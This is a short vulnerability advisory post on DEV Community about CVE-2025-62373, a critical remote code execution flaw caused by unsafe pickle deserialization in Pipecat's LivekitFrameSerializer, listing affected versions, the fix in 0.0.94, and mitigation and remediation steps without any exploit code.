DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2025-62373: CVE-2025-62373: Remote Code Execution via Insecure Deserialization in Pipecat LivekitFrameSerializer

#security #cve #cybersecurity

CVE-2025-62373: Remote Code Execution via Insecure Deserialization in Pipecat LivekitFrameSerializer

Vulnerability ID: CVE-2025-62373
CVSS Score: 9.8
Published: 2026-04-23

CVE-2025-62373 is a critical remote code execution (RCE) vulnerability in Pipecat, an open-source Python framework for building real-time voice and multimodal conversational agents. The flaw originates from the unsafe deserialization of untrusted data using Python's pickle module within the LivekitFrameSerializer class.

TL;DR

A critical insecure deserialization flaw in Pipecat versions 0.0.41 through 0.0.93 allows unauthenticated remote attackers to execute arbitrary Python code by sending malicious pickle payloads to an exposed WebSocket endpoint.

⚠️ Exploit Status: POC

Technical Details

  • CVSS Score: 9.8
  • Severity: CRITICAL
  • CWE ID: CWE-502
  • Attack Vector: Network
  • Authentication Required: None
  • CISA KEV Listed: No

Affected Systems

  • Pipecat framework (LivekitFrameSerializer)
  • Applications exposing Pipecat WebSocket endpoints
  • pipecat: >= 0.0.41, <= 0.0.93 (Fixed in: 0.0.94)

Code Analysis

Commit: c1c7a56

Removal of LivekitFrameSerializer to patch insecure deserialization vulnerability

Mitigation Strategies

  • Upgrade Pipecat to version 0.0.94 or later.
  • Migrate from LivekitFrameSerializer to LiveKitTransport for LiveKit integration.
  • Restrict network access to WebSocket endpoints using IP allowlisting.
  • Run the Pipecat application with the lowest possible system privileges.

Remediation Steps:

  1. Identify all Pipecat deployments within the infrastructure.
  2. Update the pipecat-ai dependency to >= 0.0.94 in requirements.txt, pyproject.toml, or the active package manager.
  3. Refactor application code to replace LivekitFrameSerializer with LiveKitTransport.
  4. Deploy the updated application and verify that WebSocket communication uses Protocol Buffers instead of pickled objects.

References

Read the full report for CVE-2025-62373 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)